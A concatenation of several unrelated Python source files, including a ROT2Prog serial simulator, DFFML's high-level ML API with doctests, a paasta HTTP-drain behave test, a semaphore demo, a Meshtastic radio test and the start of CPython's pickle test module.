"""Creates object, opens serial connection, and starts daemon thread to run simulator..
Args:
port (str): Name of serial port to connect to.
pulses_per_degree (int): Resolution of simulated ROT2Prog controller. Options are 1, 2, and 4.
"""
self._log = logging.getLogger(__name__)
# open serial port
self._ser = serial.Serial(
port = port,
baudrate = 600,
bytesize = 8,
parity = 'N',
stopbits = 1,
timeout = None,
inter_byte_timeout = 0.1) # inter_byte_timeout allows continued operation after a bad packet
self._pulses_per_degree = int(pulses_per_degree)
self._log.info('ROT2Prog simulation interface opened on ' + str(self._ser.name))
# start daemon thread to communicate on serial port
Thread(target = self._run, daemon = True).start()
def _run(self):
"""Receives command packets, parses them to update the state of the simulator, and sends response packets when necessary.
"""
while self._keep_running:
command_packet = list(self._ser.read(13))
self._log.debug('Command packet received: ' + str(list(map(hex, list(command_packet)))))
if len(command_packet) != 13:
self._log.critical('Incomplete command packet')
else:
K = command_packet[11]
if K in [0x0F, 0x1F]:
if K == 0x0F:
self._log.debug('Stop command received')
elif K == 0x1F:
self._log.debug('Status command received')
# convert to byte values
H = "00000" + str(round(float(self._az + 360), 1))
V = "00000" + str(round(float(self._el + 360), 1))
response_packet = [
0x57,
int(H[-5]), int(H[-4]), int(H[-3]), int(H[-1]),
self._pulses_per_degree,
int(V[-5]), int(V[-4]), int(V[-3]), int(V[-1]),
self._pulses_per_degree,
0x20]
self._log.debug('Response queued')
self._log.debug('-> Azimuth: ' + str(self._az) + '°')
self._log.debug('-> Elevation: ' + str(self._el) + '°')
self._log.debug('-> PH: ' + hex(self._pulses_per_degree))
self._log.debug('-> PV: ' + hex(self._pulses_per_degree))
self._ser.write(bytearray(response_packet))
self._log.debug('Response packet sent: ' + str(list(map(hex, list(response_packet)))))
elif K == 0x2F:
# convert from ascii characters
H = ((command_packet[1] - 0x30) * 1000) + ((command_packet[2] - 0x30) * 100) + ((command_packet[3] - 0x30) * 10) + (command_packet[4] - 0x30)
V = ((command_packet[6] - 0x30) * 1000) + ((command_packet[7] - 0x30) * 100) + ((command_packet[8] - 0x30) * 10) + (command_packet[9] - 0x30)
# decode with resolution
self._az = H/self._pulses_per_degree - 360.0
self._el = V/self._pulses_per_degree - 360.0
self._az = float(round(self._az, 1))
self._el = float(round(self._el, 1))
self._log.debug('Set command received')
self._log.debug('-> Azimuth: ' + str(self._az) + '°')
self._log.debug('-> Elevation: ' + str(self._el) + '°')
else:
self._log.error('Invalid command received (K = ' + str(hex(K)) + ')')
def stop(self):
"""Stops the daemon thread running the simulator.
"""
self._keep_running = False
|
high_level.py
|
"""
High level abstraction interfaces to DFFML. These are probably going to be used
in a lot of quick and dirty python files.
"""
import asyncio
import pathlib
from typing import Optional, Tuple, List, Union, Dict, Any, AsyncIterator
from .record import Record
from .df.types import DataFlow, Input
from .df.memory import MemoryOrchestrator
from .source.source import Sources, BaseSource
from .source.memory import MemorySource, MemorySourceConfig
from .df.base import BaseInputSetContext, BaseOrchestrator, BaseInputSet
def _records_to_sources(*args):
"""
Create a memory source out of any records passed as a variable length list.
Add all sources found in the variable length list to a list of sources, and
the created source containing records, and return that list of sources.
"""
# If the first arg is an instance of sources, append the rest to that.
if args and isinstance(args[0], Sources):
sources = args[0]
else:
sources = Sources(
*[arg for arg in args if isinstance(arg, BaseSource)]
)
# Records to add to memory source
records = []
# Make args mutable
args = list(args)
# Convert dicts to records
for i, arg in enumerate(args):
if isinstance(arg, dict):
arg = Record(i, data={"features": arg})
if isinstance(arg, Record):
records.append(arg)
if isinstance(arg, str) and "." in arg:
filepath = pathlib.Path(arg)
source = BaseSource.load(filepath.suffix.replace(".", ""))
sources.append(source(filename=arg))
# Create memory source if there are any records
if records:
sources.append(MemorySource(MemorySourceConfig(records=records)))
return sources
async def run(
dataflow: DataFlow,
*input_sets: Union[List[Input], BaseInputSet],
orchestrator: Optional[BaseOrchestrator] = None,
strict: bool = True,
ctx: Optional[BaseInputSetContext] = None,
halt: Optional[asyncio.Event] = None,
) -> AsyncIterator[Tuple[BaseInputSetContext, Dict[str, Any]]]:
"""
Run a DataFlow
Run a DataFlow using the the default orchestrator
(:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`),
or the specified one.
Parameters
----------
dataflow : DataFlow
:py:class:`DataFlow <dffml.df.types.DataFlow>` to run.
input_sets : InputSet, list, dict, optional
:py:class:`Inputs <dffml.df.types.Input>` to give to the
:py:class:`DataFlow <dffml.df.types.DataFlow>` when it starts. Can be in
multiple formats.
If each element is a ``list`` then it's expected that each element of
that list be an :py:class:`Input <dffml.df.types.Input>`, in this case
an :py:class:`InputSet <dffml.df.base.BaseInputSet>` will be created
with a random string used as the
:py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
If a ``dict`` is given then each key will become a
:py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
The value for each key should be a ``list`` of
:py:class:`Input <dffml.df.types.Input>` objects.
If each element is a :py:class:`InputSet <dffml.df.base.BaseInputSet>`
then each context
:py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
will have its respective :py:class:`Inputs <dffml.df.types.Input>` added
to it.
orchestrator : BaseOrchestrator, optional
Orchestrator to use, defaults to
:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`
if ``None``.
strict : bool, optional
If true (default), raise exceptions when they occur in operations. If
false, log exceptions without raising.
ctx : BaseInputSetContext, optional
If given and input_sets is a ``list`` then add inputs under the given
context. Otherwise they are added under randomly generated contexts.
halt : Event, optional
If given, keep the dataflow running until this :py:class:`asyncio.Event`
is set.
Returns
-------
asynciterator
``tuple`` of
:py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
and ``dict`` where contents are determined by output operations.
If multiple output operations are used, then the top level keys will be
the names of the output operations. If only one is used, then the
``dict`` will be whatever the return value of that output operation was.
Examples
--------
The following creates a TCP echo server. We write an operation which using a
DataFlow to open a connection and send a message to the server.
For the inputs to the DataFlow, we create 2 Input objects whose values are
the message to be sent to the TCP server. We also create Input objects for
the host and port. When running a DataFlow, operations will be run with each
possible permutation of their inputs.
.. TODO Autogenerate this image during docs build
graph LR
send_to_server
1[First echo message]
port[Port]
host[Host]
2[Second echo message]
1_c[Host, Port, First echo]
2_c[Host, Port, Second echo]
host --> 1_c
port --> 1_c
2 --> 2_c
port --> 2_c
host --> 2_c
1 --> 1_c
1_c --> send_to_server
2_c --> send_to_server
.. image:: /images/high_level_run_echo_server_input_combination.svg
:alt: Flow chart showing how both echo messages create a parameter set including that echo message and the host and port
Because there is a different Input object for each of the 2 "echo" messages,
one will get combined with the host and port to make an argument list for
the ``send_to_server`` operation. The other also combines with the host and
port to make another argument list. Both argument lists are used to call the
``send_to_server`` operation.
>>> # Socket server derived from
>>> # https://docs.python.org/3/library/socketserver.html#asynchronous-mixins
>>> import asyncio
>>> import threading
>>> import socketserver
>>> from dffml import *
>>>
>>> class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
... def handle(self):
... self.request.sendall(self.request.recv(1024))
>>>
>>> class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
... pass
>>>
>>> @op
... async def send_to_server(host: str, port: int, message: str):
... reader, writer = await asyncio.open_connection(host, port)
...
... writer.write(message.encode())
... await writer.drain()
...
... data = await reader.read(100)
... print(f"Client sent {message!r}, got: {data.decode()!r}")
...
... writer.close()
... await writer.wait_closed()
>>>
>>> # List of messages to send to the server, 2 long, each value is "echo"
>>> messages = [Input(value="echo", definition=send_to_server.op.inputs["message"])
... for _ in range(0, 2)]
>>>
>>> # DataFlow consisting of the single operation
>>> dataflow = DataFlow.auto(send_to_server)
>>>
>>> async def main():
... # Create a server with and pass 0 to get a random port assigned
... server = ThreadedTCPServer(("127.0.0.1", 0), ThreadedTCPRequestHandler)
... with server:
... host, port = server.server_address
...
... # Start a thread to run the server in the background
... server_thread = threading.Thread(target=server.serve_forever)
... # Exit the server thread when the main thread terminates
... server_thread.daemon = True
... server_thread.start()
...
... # Add the host and port to the list of Inputs for the DataFlow
... inputs = messages + [
... Input(value=host, definition=send_to_server.op.inputs["host"]),
... Input(value=port, definition=send_to_server.op.inputs["port"])
... ]
...
... try:
... async for ctx, results in run(dataflow, inputs):
... pass
... finally:
... server.shutdown()
>>>
>>> asyncio.run(main())
Client sent 'echo', got: 'echo'
Client sent 'echo', got: 'echo'
"""
if orchestrator is None:
orchestrator = MemoryOrchestrator.withconfig({})
async with orchestrator:
async with orchestrator(dataflow) as ctx:
async for ctx, results in ctx.run(*input_sets):
yield ctx, results
async def save(source: BaseSource, *args: Record) -> None:
"""
Update a source's knowledge about given records.
For each record given, call
:py:func:`update <dffml.source.source.BaseSourceContext.update>` on the
source. Effectively saving all the records to the source.
Parameters
----------
source : BaseSource
Data source to use. See :doc:`/plugins/dffml_source` for sources and
options.
*args : list
Records to be saved.
Examples
--------
>>> import asyncio
>>> import pathlib
>>> from dffml import *
>>>
>>> source = CSVSource(filename="save.csv", allowempty=True, readwrite=True)
>>>
>>> async def main():
... await save(
... source,
... Record(
... "myrecord",
... data={
... "features": {"Years": 0, "Expertise": 1, "Trust": 0.1},
... "prediction": {"Salary": {"value": 10, "confidence": 1.0}},
... }
... )
... )
... print(pathlib.Path("save.csv").read_text().strip())
>>>
>>> asyncio.run(main())
key,tag,Expertise,Trust,Years,prediction_Salary,confidence_Salary
myrecord,untagged,1,0.1,0,10,1.0
"""
async with source:
async with source() as sctx:
for record in args:
await sctx.update(record)
async def load(source: BaseSource, *args: str) -> AsyncIterator[Record]:
"""
Yields records from a source.
Yields all the records from the source, if record keys are given then only
those records are yielded.
Parameters
----------
source : BaseSource
Data source to use. See :doc:`/plugins/dffml_source` for sources and
options.
*args : str
Records to be returned. If empty, all the records in a source will be returned.
Returns
-------
asynciterator
:py:class:`Record <dffml.record.Record>` object
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> source = CSVSource(filename="load.csv", allowempty=True, readwrite=True)
>>>
>>> async def main():
... await save(
... source,
... Record("1", data={"features": {"A": 0, "B": 1}}),
... Record("2", data={"features": {"A": 3, "B": 4}}),
... )
...
... # All records in source
... async for record in load(source):
... print(record.export())
...
... # For specific records in a source
... async for record in load(source, "1"):
... print(record.export())
>>>
>>> asyncio.run(main())
{'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
{'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}
{'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
"""
async with source:
async with source() as sctx:
if args:
# If specific records are to be loaded
for record in args:
yield await sctx.record(record)
else:
# All the records are loaded
async for record in sctx.records():
yield record
async def train(model, *args: Union[BaseSource, Record, Dict[str, Any]]):
"""
Train a machine learning model.
Provide records to the model to train it. The model should be already
instantiated.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for training. Could be a ``dict``, :py:class:`Record`,
filename, one of the data :doc:`/plugins/dffml_source`, or a filename
with the extension being one of the data sources.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... DefFeature("Years", int, 1),
... ),
... predict=DefFeature("Salary", int, 1),
... )
>>>
>>> async def main():
... await train(
... model,
... {"Years": 0, "Salary": 10},
... {"Years": 1, "Salary": 20},
... {"Years": 2, "Salary": 30},
... {"Years": 3, "Salary": 40},
... )
>>>
>>> asyncio.run(main())
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
return await mctx.train(sctx)
async def accuracy(
model, *args: Union[BaseSource, Record, Dict[str, Any]]
) -> float:
"""
Assess the accuracy of a machine learning model.
Provide records to the model to assess the percent accuracy of its
prediction abilities. The model should be already instantiated and trained.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for training. Could be a ``dict``, :py:class:`Record`,
filename, one of the data :doc:`/plugins/dffml_source`, or a filename
with the extension being one of the data sources.
Returns
-------
float
A decimal value representing the percent of the time the model made the
correct prediction. For some models this has another meaning. Please see
the documentation for the model your using for further details.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... DefFeature("Years", int, 1),
... ),
... predict=DefFeature("Salary", int, 1),
... )
>>>
>>> async def main():
... print(
... "Accuracy:",
... await accuracy(
... model,
... {"Years": 4, "Salary": 50},
... {"Years": 5, "Salary": 60},
... ),
... )
>>>
>>> asyncio.run(main())
Accuracy: 1.0
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
return float(await mctx.accuracy(sctx))
async def predict(
model,
*args: Union[BaseSource, Record, Dict[str, Any]],
update: bool = False,
keep_record: bool = False,
):
"""
Make a prediction using a machine learning model.
The model must be trained before using it to make a prediction.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for prediction. Could be a ``dict``, :py:class:`Record`,
filename, or one of the data :doc:`/plugins/dffml_source`.
update : boolean, optional
If ``True`` prediction data within records will be written back to all
sources given. Defaults to ``False``.
keep_record : boolean, optional
If ``True`` the results will be kept as their ``Record`` objects instead
of being converted to a ``(record.key, features, predictions)`` tuple.
Defaults to ``False``.
Returns
-------
asynciterator
``Record`` objects or ``(record.key, features, predictions)`` tuple.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... DefFeature("Years", int, 1),
... ),
... predict=DefFeature("Salary", int, 1),
... )
>>>
>>> async def main():
... async for i, features, prediction in predict(
... model,
... {"Years": 6},
... {"Years": 7},
... ):
... features["Salary"] = round(prediction["Salary"]["value"])
... print(features)
>>>
>>> asyncio.run(main())
{'Years': 6, 'Salary': 70}
{'Years': 7, 'Salary': 80}
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
async for record in mctx.predict(sctx.records()):
yield record if keep_record else (
record.key,
record.features(),
record.predictions(),
)
if update:
await sctx.update(record)
|
http_drain_method_steps.py
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import http.server
import threading
from typing import List
import mock
from behave import given
from behave import then
from behave import when
from paasta_tools import drain_lib
from paasta_tools.utils import paasta_print
@given('a fake HTTP server')
def make_fake_http_server(context):
context.fake_http_server = FakeHTTPServer()
context.fake_http_server.start()
@given('a HTTPDrainMethod configured to point at that server')
def make_http_drain_method(context):
context.http_drain_method = drain_lib.HTTPDrainMethod(
service='fake_service',
instance='fake_instance',
registrations=['fake_nerve_ns'],
drain={
"url_format": "http://localhost:%d/drain" % context.fake_http_server.server.server_port,
"success_codes": "200",
},
stop_draining={},
is_draining={
"url_format": "http://localhost:%d/is_draining" % context.fake_http_server.server.server_port,
"success_codes": "200",
},
is_safe_to_kill={},
)
@when('we call {method}() and get status code {status_code:d}')
def call_drain(context, method, status_code):
fake_task = mock.Mock(host="fake_host", ports=[654321])
FakeHTTPRequestHandler.status_code = status_code
func = {
'drain': context.http_drain_method.drain,
'is_draining': context.http_drain_method.is_draining,
}[method]
context.retval = asyncio.get_event_loop().run_until_complete(func(fake_task))
@then('the server should see a request to {path}')
def check_http_server(context, path):
assert context.fake_http_server.paths == [path]
@then('the return value should be {expected_retval}')
def check_retval(context, expected_retval):
assert repr(context.retval) == expected_retval
class FakeHTTPServer:
paths: List[str] = []
def start(self):
self.server = http.server.HTTPServer(("localhost", 0), FakeHTTPRequestHandler)
self.server_thread = threading.Thread(target=self.serve)
self.server_thread.daemon = True
self.server_thread.start()
def serve(self):
self.server.serve_forever()
def shutdown(self):
FakeHTTPServer.paths = []
self.server.shutdown()
self.server_thread.join()
class FakeHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
status_code = 200
def do_GET(self):
paasta_print("Got GET for %s" % self.path)
try:
FakeHTTPServer.paths.append(self.path)
self.send_response(self.status_code)
self.end_headers()
except Exception as e:
paasta_print(e)
|
Semaphore.py
|
import logging
import threading
import time
import random
LOG_FORMAT = '%(asctime)s %(threadName)-17s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
semaphore = threading.Semaphore(0)
item = 0
def consumer():
global item
logging.info('Consumer is waiting')
semaphore.acquire()
logging.info('Consumer notify: item number {}'.format(item))
def producer():
global item
item = random.randint(0, 1000)
print('sudah set item')
logging.info('Producer notify: item number {}'.format(item))
semaphore.release()
# In[]:
def main():
for i in range(10):
t1 = threading.Thread(target=consumer)
t2 = threading.Thread(target=producer)
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
main()
|
test.py
|
import logging
from . import util
from . import SerialInterface, BROADCAST_NUM
from pubsub import pub
import time
import sys
import threading
from dotmap import DotMap
"""The interfaces we are using for our tests"""
interfaces = None
"""A list of all packets we received while the current test was running"""
receivedPackets = None
testsRunning = False
testNumber = 0
def onReceive(packet, interface):
"""Callback invoked when a packet arrives"""
print(f"From {interface.devPath}: {packet}")
p = DotMap(packet)
if p.decoded.data.typ == "CLEAR_TEXT":
# We only care a about clear text packets
receivedPackets.append(p)
def onNode(node):
"""Callback invoked when the node DB changes"""
print(f"Node changed: {node}")
def subscribe():
"""Subscribe to the topics the user probably wants to see, prints output to stdout"""
pub.subscribe(onNode, "meshtastic.node")
def testSend(fromInterface, toInterface, isBroadcast=False, asBinary=False):
"""
Sends one test packet between two nodes and then returns success or failure
Arguments:
fromInterface {[type]} -- [description]
toInterface {[type]} -- [description]
Returns:
boolean -- True for success
"""
global receivedPackets
receivedPackets = []
fromNode = fromInterface.myInfo.my_node_num
if isBroadcast:
toNode = BROADCAST_NUM
else:
toNode = toInterface.myInfo.my_node_num
logging.info(f"Sending test packet from {fromNode} to {toNode}")
wantAck = True
if not asBinary:
fromInterface.sendText(f"Test {testNumber}", toNode, wantAck=wantAck)
else:
fromInterface.sendData((f"Binary {testNumber}").encode(
"utf-8"), toNode, wantAck=wantAck)
time.sleep(45)
return (len(receivedPackets) >= 1)
def testThread(numTests=50):
logging.info("Found devices, starting tests...")
numFail = 0
numSuccess = 0
for i in range(numTests):
global testNumber
testNumber = testNumber + 1
isBroadcast = True
success = testSend(
interfaces[0], interfaces[1], isBroadcast, asBinary=(i % 2 == 0))
if not success:
numFail = numFail + 1
logging.error(
f"Test failed, expected packet not received ({numFail} failures so far)")
else:
numSuccess = numSuccess + 1
logging.info(f"Test succeeded ({numSuccess} successes so far)")
if numFail >= 3:
for i in interfaces:
i.close()
return
time.sleep(1)
def onConnection(topic=pub.AUTO_TOPIC):
"""Callback invoked when we connect/disconnect from a radio"""
print(f"Connection changed: {topic.getName()}")
global testsRunning
global interfaces
if (all(iface.isConnected for iface in interfaces) and not testsRunning):
testsRunning = True
t = threading.Thread(target=testThread, args=())
t.start()
def openDebugLog(portName):
debugname = "log" + portName.replace("/", "_")
logging.info(f"Writing serial debugging to {debugname}")
return open(debugname, 'w+', buffering=1)
def testAll():
"""
Run a series of tests using devices we can find.
Raises:
Exception: If not enough devices are found
"""
ports = util.findPorts()
if (len(ports) < 2):
raise Exception("Must have at least two devices connected to USB")
pub.subscribe(onConnection, "meshtastic.connection")
pub.subscribe(onReceive, "meshtastic.receive")
global interfaces
interfaces = list(map(lambda port: SerialInterface(
port, debugOut=openDebugLog(port), connectNow=False), ports))
for i in interfaces:
i.connect()
logging.info("Ports opened, waiting for device to complete connection")
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
try:
import numpy as np
except ImportError:
np = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, reap_threads, forget,
)
from pickle import bytes_types
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
class H(object):
pass
# Hashable mutable key
class K(object):
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
__main__.H = H
H.__module__ = "__main__"
__main__.K = K
K.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
